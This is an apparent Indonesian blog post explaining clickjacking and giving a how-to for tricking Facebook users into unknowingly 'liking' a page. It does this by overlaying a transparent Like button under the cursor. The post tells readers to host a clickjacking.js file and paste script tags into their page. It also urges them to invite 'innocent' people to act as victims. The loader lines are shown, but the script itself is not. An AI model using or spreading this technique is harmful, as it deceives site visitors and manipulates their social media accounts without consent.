Clickjacking udah marak di facebook... hati-hati..!
Clickjacking adalah sebuah teknik yang digunakan untuk mengekploitasi web browser. Dengan menggunakan teknik ini, attacker bisa dengan mudah mengelabui user untuk meng-klik sebuah link atau komponen yang diinginkan si attacker di sebuah halaman web, tanpa sepengetahuan si user.
Umumnya, metode yang digunakan dalam clickjacking ini adalah attacker menanam "jebakan" di sebuah link atau tombol yang kiranya akan di-klik oleh user. Jebakan tersebut biasanya adalah sebuah komponen yang sudah diatur sedemikian rupa, agar tidak nampak ketika dilihat oleh user, dan diletakkan di atas komponen link atau tombol. Sehingga ketika user ingin meng-klik link atau tombol tersebut, justru sebenarnya user telah meng-klik komponen jebakan tersebut. Setelah itu, terserah attacker, mau diarahkan ke situs-situs berbahaya, atau diarahkan untuk mendownload virus dan malware, si user telah jatuh ke jebakan attacker.
Facebook Clickjacking
Facebook clickjacking adalah teknik clickjacking yang ditujukan untuk menyerang pengguna facebook. Saya akan membahas tentang facebook clickjacking yang digunakan untuk me-LIKE secara otomatis sebuah halaman web, tanpa meng-klik tombol LIKE (yang biasanya disediakan oleh facebook), kita hanya perlu membuat user untuk meng-klik link apapun di halaman web yang berisi jebakan. Maka secara otomatis di profil user tersebut akan muncul entri bahwa user telah me-like halaman web jebakan.
Hal ini bisa dilakukan dengan meletakkan tombol like yang tidak kelihatan (sangat transparan) di bawah kursosr, tiap kali kursor meng-hover sebuah link. Jadi ketika user ingin meng-klik sebuah link, maka sebenarnya user akan meng-klik tombol like transparan kita.
Setelah menng-klik link (sebenarnya meng-klik tombol like kita), user akan me-like halaman tersebut di facebook, dan kemudian akan di-redirect ke lokasi link sesungguhnya. Dan cookie akan dibuat, sehingga setelah user terkena jebakan sekali, jebakan tersebut tidak akan muncul di halaman-halaman selanjutnya.
Membuat Halaman Web Berisi Jebakan Clickjacking
Untuk membuat halaman web yang berisi jebakan clickjacking ini sangat mudah sekali, ikuti langkah-langkah berikut:
Download file clickjacking.js ini, kemudian upload, agar bisa diakses di halaman teman-teman.
Tambahkan baris berikut ini ke bagian <head></head> halaman web teman-teman:
Tambahkan baris berikut ini ke bagian <head></head> halaman web teman-teman:
<script src="http://code.jquery.com/jquery-1.5.js"></script> |
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> |
<script>window.DO_CLICKJACKING = 1</script> |
<script src="http://blablabla/bla/clickjacking.js"></script> |
Perhatikan! Di baris ke 4, ganti http://blabla dan seterusnya, ganti dengan path file clickjacking.js hasil upload-an yang tadi.
Nah, pastikan semua langkah telah diikuti dengan benar, dan cobalah sendiri untuk meng-klik sembarang link di halaman jebakan. Atau undang orang lain yang tidak berdosa sebagai korban, suruh mereka mengklik sembarang link di halaman jebakan tersebut. Kemudian lihat di profile facebook mereka, entri like ke halaman teman-teman akan nongol di sana :D
(Ingat, trik ini hanya bisa mengenai pengunjung yang sedang dalam keadaan login facebook lo ya..)
(Ingat, trik ini hanya bisa mengenai pengunjung yang sedang dalam keadaan login facebook lo ya..)
Baca juga Artikel ini :
0 komentar:
Posting Komentar